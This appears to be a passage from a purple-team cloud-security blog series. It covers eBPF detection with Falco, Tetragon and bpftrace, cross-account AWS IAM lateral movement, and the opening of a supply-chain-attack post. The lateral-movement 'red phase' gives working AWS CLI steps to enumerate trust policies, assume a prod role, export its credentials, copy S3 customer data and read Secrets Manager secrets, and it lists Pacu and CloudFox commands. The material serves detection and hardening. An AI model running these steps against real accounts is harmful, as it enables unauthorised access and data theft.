EP07	SSRF to EC2 IMDS	CloudTrail: nothing. VPC Flow Logs: 169.254.169.254 destination, 15-min delay, no PID	TC kprobe: `connect()` to `169.254.169.254` from app process — PID, comm, container, real-time
EP08	Container escape via privileged mount	CloudTrail: nothing. Syslog: nothing	kprobe: `security_sb_mount()` from non-host mount namespace — namespace ID mismatch fires alert
EP09	Supply chain implant execution	CloudTrail: nothing (OS-level). GuardDuty: maybe if beacon calls AWS APIs	kprobe: `execve()` with anomalous parent chain — web process → shell → unknown binary from `/tmp`
EP10	Lateral movement via cross-account role chaining	CloudTrail: AssumeRole events present but no process context	TC hook: `connect()` to `sts.amazonaws.com` from Lambda handler process — unexpected process identity

The table is not theoretical. It reflects what you would actually observe running these detection rules against the attack simulations in those episodes.

For the SSRF case (EP07): the connection to 169.254.169.254 from the web application process would fire within milliseconds of the exploit. VPC Flow Logs would record the same IP 10–15 minutes later, with no information about which process made it. By the time the flow log is queryable, the attacker has the IAM credentials and may have made subsequent API calls in a different region.

For the container escape (EP08): the mount() from a non-host mount namespace is the earliest detectable signal of the escape attempt. It fires before the attacker has host filesystem access. With action: Sigkill in the Tetragon policy, the process is terminated at this syscall — the escape does not complete.

⚠ Production Gotchas

Use the eBPF driver for Falco in Kubernetes, not the kernel module. The kernel module requires installing a kernel module on every node, which creates a dependency on kernel headers being present and compatible. The modern_ebpf driver (Falco 0.35+) uses BTF and CO-RE — it works on kernels 5.8+ without kernel module installation and survives kernel upgrades. In managed Kubernetes (EKS, GKE, AKS), the kernel module path often doesn’t work at all due to the OS image restrictions.

Test Tetragon’s Sigkill action exhaustively before enabling it in production. The Sigkill action terminates the process at the moment of the violating syscall — before it completes. This is powerful for prevention but catastrophic if your exclusions are wrong. Common false positive sources: debug containers (kubectl debug), init containers that perform legitimate mounts, Kubernetes admission webhooks calling shell scripts. Always deploy with action: Post first, tune for two weeks of normal traffic, then switch to Sigkill only on rules with zero false positives in your environment.

bpftrace is an investigation tool, not a production detector. bpftrace compiles and loads an eBPF program per invocation — it has no persistence, no alerting, and no output routing to your SIEM. It is for the incident response scenario described in the opening: “did this process make outbound connections in the last 30 minutes?” (answered: it’s what’s happening right now). For always-on detection, use Tetragon or Falco. Running bpftrace as a daemon substitute introduces overhead without the management plane that production tools provide.

The shell-in-container rule will fire on kubectl exec sessions. Any time an operator runs kubectl exec -it <pod> -- /bin/bash, the Falco rule above triggers. This is working as intended — kubectl exec is a post-compromise technique as well as an operational tool. Handle this with an exclusion on the user identity or namespace:

# Add to the rule condition to exclude operator kubectl exec sessions
# Map your cluster admin users or service account here
and not user.name in (cluster-admin-users)
and not k8s.ns.name in (ops-tooling, debug-ns)

High-frequency kprobes on hot paths add measurable overhead. Attaching to tcp_connect fires on every outbound connection from every process on the node. On a node handling hundreds of microservices with high connection rates (service mesh with short-lived connections), this adds CPU overhead. Profile before deploying. Tetragon’s namespace-scoped selectors (matchNamespaces: NotHost) help by skipping host-namespace processes. Filter as narrowly as your threat model allows.

Ring buffer overflow silently drops events on high-throughput nodes. Both Falco and bpftrace use kernel ring buffers to pass events to userspace. If the userspace consumer (the Falco daemon, the bpftrace process) cannot keep up with the event rate, the kernel drops events silently. Falco exposes a falco_events_dropped_total metric — monitor it. Tune ring_buffer_size in the Falco configuration if drops occur on high-throughput nodes.

Quick Reference

Use Case	Tool	Hook Type	Detection Latency
Ad-hoc outbound connection investigation	bpftrace	tracepoint:syscalls:sys_enter_connect	Real-time
Always-on container shell detection	Falco	eBPF modern driver / syscall	< 100ms
Container escape prevention	Tetragon + Sigkill	kprobe: security_sb_mount	Blocking (pre-completion)
Privilege escalation detection	Falco / bpftrace	tracepoint:syscalls:sys_enter_setuid	Real-time
Supply chain implant execution	Falco execve rule	eBPF modern driver	< 100ms
SSRF-to-metadata detection	Tetragon kprobe	kprobe: tcp_connect	Real-time
Lateral movement via unexpected STS call	Tetragon kprobe	kprobe: tcp_connect + process filter	Real-time
Audit trail for incident response	Tetragon JSON events	kprobe / tracepoint	Persistent, SIEM-routable

Tool	Best For	Not For
bpftrace	Ad-hoc node investigation during IR	Always-on production detection
Falco	Rule-based behavioral detection	Network-layer enforcement
Tetragon	Always-on detection + optional enforcement	Ad-hoc one-liner investigation

Key Takeaways

Detection engineering with eBPF closes the telemetry gap that CloudTrail, VPC Flow Logs, and syslog cannot close: OS-level process activity is only visible at the kernel syscall layer, and eBPF is the only production-grade mechanism that reads it without kernel module risk
Every attack in EP07 through EP10 has a real-time kernel-level signal — SSRF connections, container mount calls, unexpected execve chains, privilege escalation attempts — none of which appear in your current SIEM unless you’ve built this layer
Falco provides declarative, rule-based behavioral detection; Tetragon provides syscall-level enforcement that can terminate an attack before it completes — use both with complementary scopes
bpftrace is the incident response tool for asking the kernel a direct question right now; it is not a monitoring agent and should not be treated as one
The false positive problem is real and must be addressed before enabling enforcement: kubectl exec, debug containers, init containers with legitimate mounts — exclusions must be tuned per environment before moving from action: Post to action: Sigkill

What’s Next

EP11 closed the detection gap. You’ve instrumented the kernel, you’re receiving Falco alerts, Tetragon is firing on namespace-crossing mount attempts. Then the alert fires at 2:47 AM on a Sunday — not a test, not a false positive. Something got in.

EP12 is the playbook for the first 24 hours after a confirmed cloud breach: what to isolate and how without destroying forensic evidence, what to preserve before it rotates out of CloudTrail’s 90-day window, what eBPF data to capture while the node is still live, who to call and in what order, and how to avoid the common mistakes that turn a containable incident into a regulatory event. The response phase — where everything you built in EP04 through EP11 either pays off or reveals what you missed.

Get EP12 in your inbox when it publishes → subscribe at linuxcent.com

Cloud Lateral Movement: Cross-Account IAM Role Chaining Explained

July 4, 2026 by Vamshi Krishna Santhapuri

Reading Time: 12 minutes

What is purple team security? → OWASP Top 10 mapped to cloud infrastructure → Cloud security breaches 2020–2025 → Broken access control in AWS → MFA fatigue attacks → CI/CD secrets exposure → SSRF to cloud metadata → Kubernetes container escape → Supply chain attacks → Cloud Lateral Movement

TL;DR

Cloud lateral movement IAM is OWASP A01: attackers move between cloud accounts by exploiting cross-account IAM trust relationships — no network pivoting, no exploit, just a valid sts:AssumeRole call
The structural vulnerability is a trust policy scoped too broadly — arn:aws:iam::DEV_ACCOUNT:root instead of the specific Lambda execution role ARN — which lets any identity in the dev account assume the prod role
The full attack chain: compromised Lambda in dev account → enumerate cross-account trust policies → aws sts assume-role into prod → access data lake S3 bucket → exfiltrate before detection fires
CloudTrail is the primary detection surface: AssumeRole events where the principal account ID differs from the resource account ID are the signal; GuardDuty surfaces the pattern as Recon:IAMUser/UserPermissions
AWS Access Analyzer automatically flags overly-broad cross-account trust policies — it should be running in every account in your organization, not just the management account
The structural fix is three layers: scope trust policy to the specific source ARN, add ExternalId for confused deputy protection, and use AWS Organizations SCPs to restrict cross-account role assumptions to approved account pairs only

OWASP Mapping: A01 Broken Access Control — cross-account IAM trust policies that specify an entire account root as the principal, instead of a specific role ARN, give any identity in the source account the ability to pivot into the target account.

The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│               CROSS-ACCOUNT IAM LATERAL MOVEMENT                    │
│                                                                      │
│   DEV ACCOUNT (111111111111)                                         │
│   ┌────────────────────────────────────────────┐                    │
│   │  Lambda: api-processor                     │                    │
│   │  Execution Role: lambda-execution-role     │◄── COMPROMISED     │
│   │                                            │                    │
│   │  Attacker has: access key for this role    │                    │
│   └───────────────────┬────────────────────────┘                    │
│                        │                                             │
│                        │  sts:AssumeRole                             │
│                        │  (cross-account API call)                  │
│                        ▼                                             │
│   ┌─────────────────────────────────────────────┐                   │
│   │  TRUST POLICY CHECK (prod account role)     │                   │
│   │                                             │                   │
│   │  Principal: arn:aws:iam::111111111111:root  │                   │
│   │              ↑ TOO BROAD — any dev identity │                   │
│   └───────────────────┬─────────────────────────┘                   │
│                        │ ALLOW                                       │
│                        ▼                                             │
│   PROD ACCOUNT (222222222222)                                        │
│   ┌────────────────────────────────────────────┐                    │
│   │  Role: datalake-reader                     │                    │
│   │  Access: s3:GetObject on prod-datalake-*   │                    │
│   │          rds:Connect on prod-analytics-db  │                    │
│   │          secretsmanager:GetSecretValue      │                    │
│   └────────────────────┬───────────────────────┘                    │
│                         │                                            │
│                         ▼                                            │
│   customer-data.parquet, analytics schemas, DB credentials          │
│   ← exfiltrated in 23 minutes                                        │
└─────────────────────────────────────────────────────────────────────┘

Cloud lateral movement IAM attacks succeed because the authentication step — the sts:AssumeRole call — works exactly as designed. The Lambda’s identity is valid. The cross-account trust policy explicitly allows it. AWS faithfully issues the temporary credentials. The entire attack is indistinguishable from legitimate application behavior at the API level, which is why the trust policy is the only reliable prevention point.

The Incident: Dev Lambda to Prod Data Lake

Post-breach analysis. The attacker didn’t find a zero-day. They found a GitHub repository.

A developer had committed an .env file to a public repo containing AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY for a Lambda execution role in the dev account. GitHub’s secret scanning flagged it and notified the security team — but the notification arrived 58 minutes after the commit. By then, an automated credential scanner had already found it, validated the keys, and passed them to an attacker.

That 58-minute window is the entire story.

The Lambda’s execution role was scoped to the dev account, so initial triage assumed the blast radius was limited to dev. It wasn’t. A previous sprint had set up a cross-account trust relationship so the Lambda could read from the prod data lake during a data quality audit. The trust policy on the datalake-reader role in prod read:

"Principal": {"AWS": "arn:aws:iam::111111111111:root"}

Not the Lambda’s specific execution role ARN. The entire dev account root. Any identity in the dev account — including the one the attacker now held — could assume datalake-reader in prod.

The attacker enumerated cross-account roles from inside the compromised Lambda context, found the trust relationship, assumed the prod role, listed the data lake S3 bucket, and exfiltrated 14 GB of customer data parquet files before the first GuardDuty finding surfaced.

The revelation: cloud lateral movement doesn’t require network pivoting. It requires finding one IAM trust relationship that’s too broad.

The compromise of the dev Lambda was recoverable — rotate credentials, remediate the repo, done. The cross-account trust policy turned it into a prod data breach.

Red Phase: The Cross-Account Attack Chain

Step 1: Enumerate Trust Policies from a Compromised Role

An attacker’s first move inside a cloud environment is always the same: establish who they are and what they can reach.

aws sts get-caller-identity
# Returns:
# {
#   "UserId": "AROAIOSFODNN7EXAMPLE:function-name",
#   "Account": "111111111111",
#   "Arn": "arn:aws:sts::111111111111:assumed-role/lambda-execution-role/function-name"
# }

# List roles in the current account and their trust policies
# The trust policy (AssumeRolePolicyDocument) shows who can assume each role
aws iam list-roles \
  --query 'Roles[*].[RoleName,AssumeRolePolicyDocument]' \
  --output json | \
  jq '.[] | {
    role: .[0],
    principals: (.[1].Statement[].Principal.AWS // .[1].Statement[].Principal.Service)
  }'

# More targeted: find roles that have cross-account trust relationships
# Look for principal ARNs from a different account ID
aws iam list-roles --output json | \
  jq --arg own_account "111111111111" \
  '.Roles[] | 
    .AssumeRolePolicyDocument.Statement[] |
    select(.Principal.AWS? | 
      strings | 
      test($own_account) | not
    ) |
    {role: .Resource // "check-parent", principal: .Principal}'

# Simulate whether the current identity can assume a specific cross-account role
# This confirms the trust policy actually allows the assumption before trying it
aws iam simulate-principal-policy \
  --policy-source-arn arn:aws:iam::111111111111:role/lambda-execution-role \
  --action-names sts:AssumeRole \
  --resource-arns arn:aws:iam::222222222222:role/datalake-reader \
  --query 'EvaluationResults[0].EvalDecision' \
  --output text
# Returns: allowed

Step 2: Assume the Cross-Account Role

# Assume the target role — this is the lateral movement step
aws sts assume-role \
  --role-arn arn:aws:iam::222222222222:role/datalake-reader \
  --role-session-name "recon-$(date +%s)" \
  --query 'Credentials'
# Returns:
# {
#   "AccessKeyId": "ASIAIOSFODNN7EXAMPLE",
#   "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
#   "SessionToken": "IQoJb3JpZ2luX2...(truncated)",
#   "Expiration": "2024-01-15T14:32:00Z"
# }

# Export the credentials to use in subsequent commands
export AWS_ACCESS_KEY_ID="ASIAIOSFODNN7EXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2..."

# Confirm the new identity — now operating in prod account context
aws sts get-caller-identity
# {
#   "Account": "222222222222",  ← prod account
#   "Arn": "arn:aws:sts::222222222222:assumed-role/datalake-reader/recon-1705327920"
# }

Step 3: Enumerate and Exfiltrate from Prod

# What buckets are accessible from this role?
aws s3 ls

# Enumerate the data lake bucket
aws s3 ls --recursive s3://prod-datalake-bucket | \
  awk '{print $3, $4}' | \
  sort -rn | \
  head -20
# Shows: file sizes and paths
# 15728640  customer-data/2024/01/customer-data.parquet
# 8388608   analytics/sessions/session-events.parquet
# ...

# Exfiltrate — this is a single API call, logged in CloudTrail
aws s3 cp s3://prod-datalake-bucket/customer-data/2024/01/ /tmp/ \
  --recursive \
  --quiet

# Check for Secrets Manager access
aws secretsmanager list-secrets \
  --query 'SecretList[].{Name:Name,LastRotated:LastRotatedDate}' \
  --output table

aws secretsmanager get-secret-value \
  --secret-id prod/analytics-db/credentials \
  --query 'SecretString' \
  --output text

Step 4: Role Chaining — Staying in the Environment

Role chaining is assuming one role then using that session to assume another. It extends the attacker’s reach without returning to the original compromised identity.

# From the prod datalake-reader context, can we go further?
# Check what other roles trust this prod role, or what this role can assume
aws iam list-roles --output json | \
  jq '.Roles[] | 
    select(.AssumeRolePolicyDocument.Statement[].Principal.AWS? | 
      strings | 
      test("datalake-reader")
    ) | .RoleName'

# If the datalake-reader role has sts:AssumeRole permissions itself,
# the chain continues — each hop gets a fresh 1-hour session
aws sts assume-role \
  --role-arn arn:aws:iam::222222222222:role/analytics-admin \
  --role-session-name "second-hop-$(date +%s)"

Tools Attackers Use for Cloud Lateral Movement Enumeration

Pacu (Rhino Security Labs): Modular AWS exploitation framework. The iam__enum_users_roles_policies_groups and iam__privesc_scan modules map the full IAM graph and identify assumption paths automatically.

# Pacu: enumerate IAM and find assumable roles
pacu
> run iam__enum_users_roles_policies_groups
> run iam__privesc_scan

CloudFox (Bishop Fox): Designed specifically for finding attack paths in cloud environments. The assume-role command enumerates all roles the current identity can assume, including cross-account.

# CloudFox: find all roles assumable from current identity
cloudfox aws -p target-profile assume-role -v2

# CloudFox: find all cross-account trust relationships
cloudfox aws -p target-profile resource-trusts -v2

aws-recon: Broad enumeration tool that maps IAM, S3, EC2, RDS, Secrets Manager, and trust relationships across accounts in a single pass.

Blue Phase: Detection

CloudTrail Signal: Cross-Account AssumeRole

Every sts:AssumeRole call is logged in CloudTrail. Cross-account calls are the specific signal to filter for.

# Query CloudTrail for cross-account AssumeRole events in the last 24 hours
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole \
  --start-time "$(date -d '24 hours ago' --iso-8601=seconds)" \
  --output json | \
  jq '.Events[].CloudTrailEvent | fromjson |
    select(
      .requestParameters.roleArn != null and
      (.userIdentity.accountId != null) and
      (.requestParameters.roleArn | test(.userIdentity.accountId) | not)
    ) |
    {
      time: .eventTime,
      source_identity: .userIdentity.arn,
      source_account: .userIdentity.accountId,
      assumed_role: .requestParameters.roleArn,
      session_name: .requestParameters.roleSessionName,
      source_ip: .sourceIPAddress
    }'

The CloudTrail event structure for a cross-account assumption looks like this:

{
  "eventSource": "sts.amazonaws.com",
  "eventName": "AssumeRole",
  "userIdentity": {
    "type": "AssumedRole",
    "accountId": "111111111111",
    "arn": "arn:aws:sts::111111111111:assumed-role/lambda-execution-role/function-name"
  },
  "requestParameters": {
    "roleArn": "arn:aws:iam::222222222222:role/datalake-reader",
    "roleSessionName": "recon-1705327920"
  },
  "sourceIPAddress": "203.0.113.42",
  "userAgent": "aws-cli/2.13.0 Python/3.11.0 Linux/5.15.0"
}

The key fields: userIdentity.accountId is 111111111111 (dev), requestParameters.roleArn contains 222222222222 (prod). Those two account IDs not matching is the cross-account signal.

A fresh compromise indicator: userAgent showing aws-cli for a role that normally only calls AWS APIs from Lambda runtime (which uses the Python SDK and shows a different user agent). Lambda functions don’t call the CLI — if you see aws-cli user agent on a Lambda role, that’s a human or automated tool using stolen credentials.

Athena Query: Cross-Account Assumptions Across the Organization

-- Athena against S3-backed CloudTrail logs (org-level trail)
-- Finds all cross-account AssumeRole events in the past 7 days
SELECT
  eventtime,
  useridentity.accountid AS source_account,
  useridentity.arn AS source_identity,
  requestparameters['roleArn'] AS target_role,
  sourceipaddress,
  useragent,
  -- Flag: session created quickly after identity first seen (fresh compromise)
  CASE
    WHEN DATEDIFF(
      'minute',
      CAST(eventtime AS timestamp),
      CURRENT_TIMESTAMP
    ) < 300 THEN 'RECENT'
    ELSE 'AGED'
  END AS session_age
FROM cloudtrail_logs
WHERE
  eventsource = 'sts.amazonaws.com'
  AND eventname = 'AssumeRole'
  AND errorcode IS NULL
  AND from_iso8601_timestamp(eventtime) > current_timestamp - interval '7' day
  -- Cross-account: source account ID not in the target role ARN
  AND useridentity.accountid NOT IN (
    SELECT DISTINCT
      REGEXP_EXTRACT(requestparameters['roleArn'], 'arn:aws:iam::(\d+):', 1)
    FROM cloudtrail_logs
    WHERE eventname = 'AssumeRole'
  )
ORDER BY eventtime DESC;

GuardDuty Findings for IAM Lateral Movement

GuardDuty surfaces the following finding types relevant to cross-account lateral movement:

Finding Type	What It Signals
`Recon:IAMUser/UserPermissions`	Identity enumerating IAM roles, policies, or permissions — consistent with Step 1
`PrivilegeEscalation:IAMUser/AdministrativePermissions`	API calls attempting to gain admin access
`UnauthorizedAccess:IAMUser/TorIPCaller`	Assumed role used from Tor exit node
`CredentialAccess:IAMUser/AnomalousBehavior`	Credential access pattern deviates from baseline
`Exfiltration:S3/ObjectRead.Unusual`	S3 read volume spike — fires after the exfiltration in Step 3

# Pull active GuardDuty findings scoped to IAM lateral movement indicators
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": [
          "Recon:IAMUser/UserPermissions",
          "PrivilegeEscalation:IAMUser/AdministrativePermissions",
          "CredentialAccess:IAMUser/AnomalousBehavior",
          "Exfiltration:S3/ObjectRead.Unusual"
        ]
      },
      "severity": {
        "GreaterThanOrEqualTo": 4
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {
    type: .Type,
    severity: .Severity,
    account: .AccountId,
    resource: .Resource.AccessKeyDetails.UserName,
    created: .CreatedAt
  }'

AWS Access Analyzer: Automated Trust Policy Audit

Access Analyzer scans all resource-based policies in the account and flags any that grant access to principals outside the account or organization. It surfaces the vulnerable trust policy before an attacker finds it.

# List all Access Analyzer findings — these are cross-account or public access grants
ANALYZER_ARN=$(aws accessanalyzer list-analyzers \
  --query 'analyzers[0].arn' --output text)

aws accessanalyzer list-findings \
  --analyzer-arn "${ANALYZER_ARN}" \
  --filter '{"status": {"eq": ["ACTIVE"]}}' \
  --output json | \
  jq '.findings[] | {
    id: .id,
    resource_type: .resourceType,
    resource: .resource,
    principal: .principal,
    action: .action,
    condition: .condition,
    created: .createdAt
  }'

An Access Analyzer finding for the vulnerable trust policy looks like:

{
  "id": "a1b2c3d4-...",
  "resourceType": "AWS::IAM::Role",
  "resource": "arn:aws:iam::222222222222:role/datalake-reader",
  "principal": {"AWS": "arn:aws:iam::111111111111:root"},
  "action": ["sts:AssumeRole"],
  "condition": {},
  "status": "ACTIVE"
}

The arn:aws:iam::111111111111:root principal with no condition block is the flag — the entire dev account, no restrictions.

Purple Phase: Structural Fixes

Fix 1: Scope the Trust Policy to the Specific Source ARN

This is the primary fix. The trust policy should name the exact role that needs access, not the account root.

// BAD — allows any identity in the dev account to assume this role
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::111111111111:root"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

// GOOD — only the specific Lambda execution role can assume this role
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::111111111111:role/api-processor-lambda-execution-role"
      },
      "Action": "sts:AssumeRole",
      "Condition": {
        "StringEquals": {
          "sts:ExternalId": "prod-datalake-access-v1"
        }
      }
    }
  ]
}

# Update an existing trust policy to scope it properly
aws iam update-assume-role-policy \
  --role-name datalake-reader \
  --policy-document file://scoped-trust-policy.json

Fix 2: Add ExternalId for Confused Deputy Protection

ExternalId is a shared secret between the two parties establishing the cross-account trust. When the source role calls sts:AssumeRole, it must provide the ExternalId value, or the assumption is denied.

This protects against the confused deputy problem: an attacker who compromises a role that legitimately trusts your role cannot exploit that trust without also knowing the ExternalId.

# Source (dev Lambda) must pass ExternalId when assuming the prod role
aws sts assume-role \
  --role-arn arn:aws:iam::222222222222:role/datalake-reader \
  --role-session-name "api-processor-job" \
  --external-id "prod-datalake-access-v1"
# If ExternalId is wrong or absent: error — not authorized to assume role

The limitation: ExternalId does not help if the source account itself is compromised and the attacker has access to the application code or environment variables that contain the ExternalId value. It adds friction for opportunistic attackers and covers the confused deputy scenario — it is not a substitute for scoping the principal ARN.

Fix 3: Organizations SCPs to Restrict Cross-Account Assumptions

Service Control Policies at the AWS Organizations level can restrict which accounts are allowed to assume roles in which other accounts. This is the enforcement layer that cannot be bypassed by any identity inside a member account.

// SCP: Only allow cross-account role assumptions between approved account pairs
// Attach to the prod account's OU
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "RestrictCrossAccountAssumeRole",
      "Effect": "Deny",
      "Action": "sts:AssumeRole",
      "Resource": "*",
      "Condition": {
        "StringNotEquals": {
          "aws:PrincipalAccount": [
            "111111111111",
            "333333333333"
          ]
        },
        "BoolIfExists": {
          "aws:PrincipalIsAWSService": "false"
        }
      }
    }
  ]
}

This SCP denies any sts:AssumeRole call that originates from an account not in the approved list. Even if someone adds a new trust policy in prod that allows an arbitrary external account, the SCP blocks the call at the organization level.

Fix 4: Enable Access Analyzer Organization-Wide

Access Analyzer should run with an organization-level analyzer, not just per-account. The organization analyzer has visibility across all member accounts and flags cross-account trust policies automatically.

# Create an organization-level analyzer (run from the management account)
aws accessanalyzer create-analyzer \
  --analyzer-name org-wide-access-analyzer \
  --type ORGANIZATION \
  --tags '{"Environment": "production", "Team": "security"}'

# List active findings organization-wide
ANALYZER_ARN=$(aws accessanalyzer list-analyzers \
  --query "analyzers[?type=='ORGANIZATION'].arn | [0]" \
  --output text)

aws accessanalyzer list-findings \
  --analyzer-arn "${ANALYZER_ARN}" \
  --filter '{"resourceType": {"eq": ["AWS::IAM::Role"]}, "status": {"eq": ["ACTIVE"]}}' \
  --output json | \
  jq '.findings[] | {resource: .resource, principal: .principal}'

Fix 5: Prefer OIDC Workload Identity Over Cross-Account Roles

Where the access pattern allows it, replacing the cross-account role with OIDC workload identity eliminates the static trust relationship entirely. A Lambda function with an OIDC identity can authenticate to the prod account by exchanging a token, without any persistent trust policy entry that an attacker could enumerate and exploit.

The federated identity trust boundaries approach using OIDC workload identity removes the assumable role from the attack surface completely — there is no trust policy to misscope, no role ARN to enumerate, and no sts:AssumeRole call in CloudTrail to detect because the assumption never happens.

Fix 6: Enable GuardDuty Cross-Account Threat Detection at Org Level

GuardDuty with multi-account management via AWS Organizations correlates threat signals across accounts. A pattern that looks like routine IAM activity in isolation — role assumption, S3 ListBucket, GetObject — reads as a lateral movement sequence when correlated across dev and prod accounts.

# Enable GuardDuty for all accounts in the organization (from management account)
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty update-organization-configuration \
  --detector-id "${DETECTOR_ID}" \
  --auto-enable \
  --data-sources '{
    "S3Logs": {"AutoEnable": true},
    "Kubernetes": {"AuditLogs": {"AutoEnable": true}},
    "MalwareProtection": {"ScanEc2InstanceWithFindings": {"AutoEnable": true}}
  }'

⚠ Production Gotchas

ExternalId doesn’t protect you if the source account is compromised. The attacker who holds the dev Lambda’s execution role credentials also has access to the Lambda’s environment variables and source code — where the ExternalId value is likely stored. ExternalId is not a secret the attacker can’t reach; it is a value the legitimate caller passes to prove it initiated the request. Scope the principal ARN first; add ExternalId as a second layer.

Access Analyzer only catches public and cross-account access, not intra-account lateral movement. If the attacker is already operating inside the same account as the target role, Access Analyzer does not flag the trust relationship. Intra-account over-broad trust policies require IAM policy analysis tooling (Cloudsplaining, Prowler) to surface — Access Analyzer won’t show them.

Role chaining resets the session clock but the window is still one hour. sts:AssumeRole sessions last up to one hour by default. An attacker doing role chaining gets a fresh one-hour window at each hop. Persistent access requires refreshing before expiry — which means repeated AssumeRole calls in CloudTrail that form a detectable pattern if you’re querying for it.

S3 exfiltration may not trigger GuardDuty immediately. GuardDuty’s Exfiltration:S3/ObjectRead.Unusual finding uses a behavior baseline. A new attacker session has no baseline — the first data exfiltration may not fire the finding if the volume appears “normal” relative to what GuardDuty has seen from that role before. CloudTrail GetObject events are the reliable signal; don’t rely on GuardDuty alone for S3 exfiltration detection.

arn:aws:iam::ACCOUNT:root in a trust policy does not mean the root user specifically. This is a common misread. arn:aws:iam::123456789012:root means any principal in account 123456789012 — IAM users, roles, the root user, and federated identities. It is the account-level wildcard, which is exactly why it’s dangerous in a cross-account trust policy.

Quick Reference

Lateral Movement Technique	CloudTrail Signal	Detection Tool	Structural Fix
Cross-account `sts:AssumeRole`	`AssumeRole` where source accountId ≠ target accountId in role ARN	CloudTrail + Athena query	Scope Principal to specific role ARN
Account root as trust principal	Access Analyzer ACTIVE finding on IAM Role	AWS Access Analyzer	Replace `root` with specific ARN + ExternalId
Role chaining across accounts	Multiple sequential `AssumeRole` events, each with new session token	CloudTrail session correlation	SCP restricting cross-account assumptions to approved pairs
Exfiltration via assumed prod role	S3 `GetObject`/`ListBucket` from assumed-role session in CloudTrail	CloudTrail + GuardDuty `Exfiltration:S3/ObjectRead.Unusual`	Least-privilege S3 policy on prod role + S3 Access Logs
IAM enumeration from compromised identity	`iam:ListRoles`, `iam:GetRole`, `iam:SimulatePrincipalPolicy`	GuardDuty `Recon:IAMUser/UserPermissions`	Deny `iam:*` on Lambda execution roles
Secrets Manager access via assumed role	`secretsmanager:GetSecretValue` from unexpected principal	CloudTrail resource policy audit	Attach resource policy to secrets scoping allowed principals

Key Takeaways

Cloud lateral movement IAM chains are not exploits — they are valid API calls that execute because someone wrote a trust policy that was too broad; the fix is always in the trust policy, not in the network
Every cross-account trust policy that uses arn:aws:iam::ACCOUNT:root as the principal is an open door for any compromised identity in that account — scope it to the specific role ARN before an attacker finds it before you do
CloudTrail AssumeRole events where the principal’s account ID doesn’t match the target role’s account ID are the detection signal; run the Athena query in your environment this week and look at what comes back
AWS Access Analyzer with an organization-level analyzer surfaces the vulnerable trust policies automatically — if you’re not running it, you’re auditing trust policies manually or not at all
IAM privilege escalation paths and cross-account lateral movement compound: an attacker who escalates privilege inside a source account has more roles to attempt cross-account assumptions from, extending the blast radius further
Defense in depth requires all three layers: scoped trust policy principal, ExternalId condition, and an SCP blocking assumptions from non-approved accounts — any single layer has a bypass

What’s Next

EP11 is where the series pivots from attack paths to detection engineering. We’ve covered how attackers compromise identities, escalate privilege, move laterally through cloud accounts, and exfiltrate data. EP11 asks a harder question: how do you build detection rules that catch these techniques at the kernel level — before the attack completes, not after it shows up in CloudTrail?

The answer involves eBPF: kernel-level visibility that gives you process execution context, network connections, and file system access in real time, mapped to the cloud workload identity making the API calls. A SIEM ingesting CloudTrail logs sees what happened after the fact. eBPF running on the node sees the aws sts assume-role subprocess spawn, the credential file write, and the outbound S3 connection — while it’s happening.

Get EP11 in your inbox when it publishes → subscribe at linuxcent.com

Supply Chain Attacks: From SolarWinds to XZ Utils — Detection and Defense

June 30, 2026 by Vamshi Krishna Santhapuri

Reading Time: 14 minutes

TL;DR

Supply chain attack detection is OWASP A06 + A08: attackers compromise the software build or distribution chain so that legitimate, signed artifacts deliver malicious payloads — standard vulnerability scanning misses this entirely
SolarWinds (December 2020): threat actors compromised the Orion build system in March 2020, waited eight months, inserted the SUNBURST backdoor into a digitally signed update, and reached 18,000+ organizations including the U.S. Treasury, DHS, and DoD
XZ Utils (CVE-2024-3094, March 2024): the “Jia Tan” persona spent two years building open-source credibility before inserting a backdoor into release tarballs — the backdoor was not in the git repo, only in the distributed tarball (release tarball = the compressed archive that Linux distributions download to build the package — separate from the git source tree)
The XZ backdoor targeted liblzma, which is linked into sshd via systemd on affected distros — a compromised SSH daemon on every major Linux distribution was days away from shipping
Detection relied on human observation: Andres Freund noticed a 500ms SSH connection delay during unrelated benchmarking, traced it with strace, and found sshd making unexpected calls into liblzma
The structural fix is a pipeline: pin dependencies with hashes + private artifact registry + SBOM generation + image signing with Sigstore/cosign — each layer catches a different attack class

OWASP Mapping: A06 Vulnerable and Outdated Components — compromised upstream dependencies. A08 Software and Data Integrity Failures — build artifacts not signed or verified; release tarball content not validated against source.

The Big Picture

┌──────────────────────────────────────────────────────────────────────────┐
│                  SUPPLY CHAIN ATTACK SURFACE                             │
│                                                                          │
│   SOURCE REPO          BUILD SYSTEM         ARTIFACT REGISTRY           │
│   github.com/org  ──▶  CI/CD pipeline  ──▶  container registry / PyPI  │
│        │                    │                      │                     │
│        │                    │                      │                     │
│   ATTACK POINT 1:      ATTACK POINT 2:       ATTACK POINT 3:            │
│   Social engineer      Compromise the        Typosquatting /             │
│   maintainer trust     build host            dependency confusion        │
│   (XZ model)           (SolarWinds model)    (public registry model)    │
│        │                    │                      │                     │
│        └────────────────────┴──────────────────────┘                    │
│                             │                                            │
│                    COMPROMISED ARTIFACT                                  │
│             (signed, valid, ships with legitimate release)               │
│                             │                                            │
│                             ▼                                            │
│        PRODUCTION SYSTEMS (18,000 orgs / every major Linux distro)      │
│                                                                          │
│   ═══════════════════════════════════════════════════════════════        │
